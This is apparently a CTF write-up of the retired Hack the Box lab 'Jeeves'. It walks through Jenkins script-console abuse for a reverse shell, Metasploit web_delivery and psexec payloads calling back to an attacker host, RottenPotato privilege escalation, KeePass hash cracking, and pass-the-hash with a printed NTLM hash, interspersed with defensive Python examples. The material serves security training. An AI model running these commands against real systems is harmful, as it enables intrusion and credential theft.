Hello Friends!! Today we are going to solve another CTF challenge, “Jeeves”. This VM is also developed by Hack the Box; Jeeves is a retired lab, and there are multiple ways to breach this VM. In this lab, we escalated to root privilege in 3 different ways, and to complete the challenge of this VM we took help from Tally (Hack the Box).
Level: Medium
Task: Find user.txt and root.txt in the vulnerable lab.
Let’s Begin!!
As these labs are only available online, they have a static IP. The Jeeves lab has IP 10.10.10.63.
Now, as always, let’s begin our hacking with port enumeration.
nmap -A 10.10.10.63
Looking at its result, we found that ports 22, 80, 135, 445 and 50000 are open; moreover, ports 135 and 445 point towards a Windows operating system.
Subsequently, we first checked the web service by opening the target IP in a web browser; it served an “Ask Jeeves search engine” webpage. So we tried to search for a website such as google.com, and a new web page showing a fake error page came up in front of us.
Opening port 50000 in a web browser gave us an HTTP 404 error page.
Then we decided to use OWASP DirBuster for a directory brute-force attack.
From its result, we found so many directories, but we went with /askjeeves for the further process.
So when we explored 10.10.10.63:50000/askjeeves, it led us to the “Jenkins Dashboard”. Ahhh!! It was a WOW moment for us, because we knew that there are so many methods to exploit Jenkins. Thus we moved into the "Manage Jenkins" option, as it is the spine of Jenkins and abusing it was quite soothing.
There were so many options, but we were interested in the Script Console, because Jenkins has a very nice Groovy script console that allows someone to execute arbitrary Groovy scripts within the Jenkins master runtime.
We found a Java reverse shell on GitHub, so we copied the code and modified its localhost and port as per our specification. Then we started a Netcat listener and ran the above Groovy script to catch the victim's reverse connection. From the image below, you can observe that we got a tty shell on the victim’s machine.
As we love the meterpreter shell, we loaded the Metasploit framework and executed the commands below.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text for powershell.exe and paste it inside the CMD shell as shown in the next image.
Paste above malicious code here in netcat.
You will get a meterpreter session on the victim’s machine in your Metasploit framework; after that, finish the task by grabbing the user.txt and root.txt files. Further, type the following:
getuid
But currently we don’t have NT AUTHORITY\SYSTEM permission. However, we knew the techniques we had used in the Tally CTF for gaining NT AUTHORITY\SYSTEM permission. Therefore, taking help from our previous article “Tally”, we executed the commands below and successfully gained NT AUTHORITY\SYSTEM permission.
upload /root/Desktop/RottenPotato/rottenpotato.exe .
load incognito
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid
Let me tell you this: we have solved so many CTF challenges of Hack the Box, some of them built on the Windows operating system, and we always grabbed the user.txt file from inside a folder owned by some username and root.txt from inside the Administrator folder; both these folders are present inside C:\Users.
Similarly, you can observe the same thing here also, and you might have got my intention from the words above. So let’s grab the user.txt file first, from inside /kohsuke/Desktop.
COOL!!! We have captured the 1st flag.
Then we went for the root.txt file, BUT it was a little bit tricky to get, because the author has hidden the root.txt file using an ADS technique (Windows Alternate Data Streams). To grab that file, you can execute the commands below.
cd Administrator
cd Desktop
ls -al
cat hm.txt
dir /R
more < hm.txt:root.txt
Hurray!! The /R flag of the dir command discloses the root.txt stream, and we successfully completed the 2nd task.
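The dir /R listing above is the quickest built-in way to spot an alternate data stream, since Explorer and a plain dir never show one. The Python below is an added example, not code from the page, that parses a constructed dir /R listing (modelled on the Desktop folder above; sizes and dates are made up) and reports every file carrying a hidden stream together with the read command used on this page.

```python
import re

# Constructed sample of `dir /R` output, modelled on the Desktop listing above
# (not the page's real listing; sizes and dates are made up).
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 7E0A-2C3B

 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  11:03 PM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/03/2017  11:02 PM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,611,404,800 bytes free
"""

# A stream line has no date/time prefix: only a size and "<file>:<stream>:$DATA".
STREAM_LINE = re.compile(r"^\s+(\d[\d,]*)\s+(.+?):([^:]+):\$DATA\s*$")

def find_alternate_streams(listing: str) -> dict:
    """Map each file name to a list of (stream_name, size_in_bytes) found in a
    `dir /R` listing. dir /R prints only the *alternate* streams (never the
    default ::$DATA), so every match is hidden content worth inspecting."""
    streams = {}
    for line in listing.splitlines():
        m = STREAM_LINE.match(line)
        if not m:
            continue
        size, fname, sname = m.groups()
        streams.setdefault(fname, []).append((sname, int(size.replace(",", ""))))
    return streams

def read_command_for(fname: str, sname: str) -> str:
    """The cmd.exe command this page uses to read a named stream."""
    return f"more < {fname}:{sname}"

if __name__ == "__main__":
    for fname, entries in find_alternate_streams(SAMPLE_DIR_R).items():
        for sname, size in entries:
            print(f"{fname} hides '{sname}' ({size} bytes): {read_command_for(fname, sname)}")
```

Running the same parser over `dir /R /S` output of a whole volume is a cheap way to audit a host for streams that a plain directory listing would never reveal.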
2nd Method
When you have a fresh meterpreter session 1, move into the /document directory and download the CEH.kdbx file. Here also we took help from our previous article TALLY.
Now run the python script that extracts a HashCat/John-crackable hash from KeePass 1.x/2.x databases.
python keepass2john.py CEH.kdbx > passkey
Next, we used John the Ripper to crack the hash stored in “passkey” with the help of the following command.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt passkey
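The keepass2john step only reads the database's unencrypted outer header (seeds, IV and the key-derivation round count) and packs those values into a john hash line; the wordlist attack then runs the same key derivation per guess, so a rockyou-grade master password falls regardless of the encryption. The Python below is an added example, not from the page or from the KeePass or john projects, that parses that header from a constructed KDBX 3.1 file; the field ids and the AES cipher UUID follow the published KDBX format.

```python
import struct

# KDBX 2.x/3.x signatures and the outer-header field ids keepass2john reads.
KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67
FIELD_NAMES = {2: "cipher_id", 4: "master_seed", 5: "transform_seed",
               7: "encryption_iv", 9: "stream_start_bytes"}

def parse_kdbx_header(blob: bytes) -> dict:
    """Parse the unencrypted outer header of a KDBX 2.x/3.x database.
    Returns the named fields plus 'version', 'transform_rounds' and
    'header_end' (offset where ciphertext begins)."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", blob, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX 2.x/3.x file")
    fields, off = {"version": f"{major}.{minor}"}, 12
    while True:
        fid, size = struct.unpack_from("<BH", blob, off)   # TLV: id, length
        off += 3
        data = blob[off:off + size]
        off += size
        if fid == 0:                                       # EndOfHeader
            break
        if fid == 6:                                       # AES-KDF round count
            fields["transform_rounds"] = struct.unpack("<Q", data)[0]
        elif fid in FIELD_NAMES:
            fields[FIELD_NAMES[fid]] = data.hex()
    fields["header_end"] = off
    return fields

def build_sample_kdbx(rounds: int) -> bytes:
    """Constructed KDBX 3.1 header followed by dummy bytes; demo input only."""
    def tlv(fid, data):
        return struct.pack("<BH", fid, len(data)) + data
    hdr = struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)          # v3.1
    hdr += tlv(2, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))  # AES-256 UUID
    hdr += tlv(3, struct.pack("<I", 1))                             # gzip compression
    hdr += tlv(4, bytes(range(32)))                                 # master seed
    hdr += tlv(5, bytes(range(32, 64)))                             # transform seed
    hdr += tlv(6, struct.pack("<Q", rounds))                        # KDF rounds
    hdr += tlv(7, bytes(range(16)))                                 # encryption IV
    hdr += tlv(9, bytes(range(64, 96)))                             # stream start bytes
    hdr += tlv(0, b"\r\n\r\n")                                      # end of header
    return hdr + bytes(32)                                          # stand-in ciphertext

if __name__ == "__main__":
    h = parse_kdbx_header(build_sample_kdbx(6000))
    print(f"KDBX {h['version']}: {h['transform_rounds']} KDF rounds, "
          f"ciphertext starts at offset {h['header_end']}")
```

The transform_rounds value is the only knob that slows an offline guess; a database whose header shows a low round count and whose master password is in a common wordlist is protected by neither.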
So we found the master key "moonshine1" for KeePass2, which is an application used for keeping your passwords. If you don't have it, install it (keepass2) using the following command.
apt-get install keepass2 -y
After installing, run the command below and submit “moonshine1” in the master key field.
keepass2 tim.kdbx
Inside CEH we found so many credentials; we copied all the passwords from there, pasted them into a text file, and got a few passwords and one NTLM hash value: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
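The value above is an LM:NT pair, and its LM half is the well-known hash of an empty password, which Windows stores whenever LM hashing is disabled; the NT half alone is a usable credential, so a pair like this sitting in a password-manager entry or a notes export is as sensitive as the password itself. The Python below is an added example, not from the page, that scans free text for such pairs and flags the two constants a reviewer should recognise; the sample export is constructed apart from the page's own hash.

```python
import re

# Well-known hash constants: the LM half of an empty password (stored whenever
# LM hashing is disabled) and the NT hash of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HASH_PAIR = re.compile(r"\b([0-9a-fA-F]{32}):([0-9a-fA-F]{32})\b")

def classify_hash_pair(pair: str) -> dict:
    """Split an 'LM:NT' string and note what each half tells a reviewer."""
    m = HASH_PAIR.fullmatch(pair.strip())
    if not m:
        raise ValueError("expected 32-hex:32-hex")
    lm, nt = (x.lower() for x in m.groups())
    return {"lm": lm, "nt": nt,
            "lm_disabled": lm == EMPTY_LM,   # no LM hash stored: only NT is usable
            "nt_blank": nt == EMPTY_NT}      # account has an empty password

def find_hash_pairs(text: str) -> list:
    """Scan free text (a notes export, a pasted password list) for LM:NT pairs,
    which are credentials in their own right since NTLM accepts the NT hash."""
    return [classify_hash_pair(f"{lm}:{nt}") for lm, nt in HASH_PAIR.findall(text)]

# Constructed sample export: the page's hash plus a made-up second entry.
SAMPLE_EXPORT = """\
Backup stuff: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
legacy box (constructed): 0123456789abcdef0123456789abcdef:31d6cfe0d16ae931b73c59d7e0c089c0
not a hash: deadbeef
"""

if __name__ == "__main__":
    for h in find_hash_pairs(SAMPLE_EXPORT):
        print(h["nt"], "LM disabled" if h["lm_disabled"] else "LM present",
              "blank password" if h["nt_blank"] else "")
```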
use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 10.10.10.63
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
msf exploit(windows/smb/psexec) > set lport 8888
msf exploit(windows/smb/psexec) > exploit
Awesome!!! We have meterpreter session 2 with proper NT AUTHORITY\SYSTEM permission; now use the above steps to get the root.txt file.
Note: we rebooted the target’s VM before starting the 2nd method.
When you have a fresh meterpreter session 2 (via psexec), execute the following command to enable the remote desktop service on the victim's machine.
run getgui -e
shell
Now we have the victim’s command prompt with administrator privilege, thus we can change the administrator user's password directly using the net user command.
net user administrator 123
Now open a new terminal in your Kali Linux and type the rdesktop 10.10.10.63 command to access the remote desktop service of the victim’s machine; after that, submit the credentials administrator:123 to log in.
BOOOOOM!!! Look at the screen of our victim; now let’s grab the root flag and enjoy this GUI mode.
Finding user.txt is quite easy; you can try it on your own. To grab the root.txt flag, open the CMD prompt and type the following commands as done above.
dir /R
more < hm.txt:root.txt
Enjoy Hacking!!!!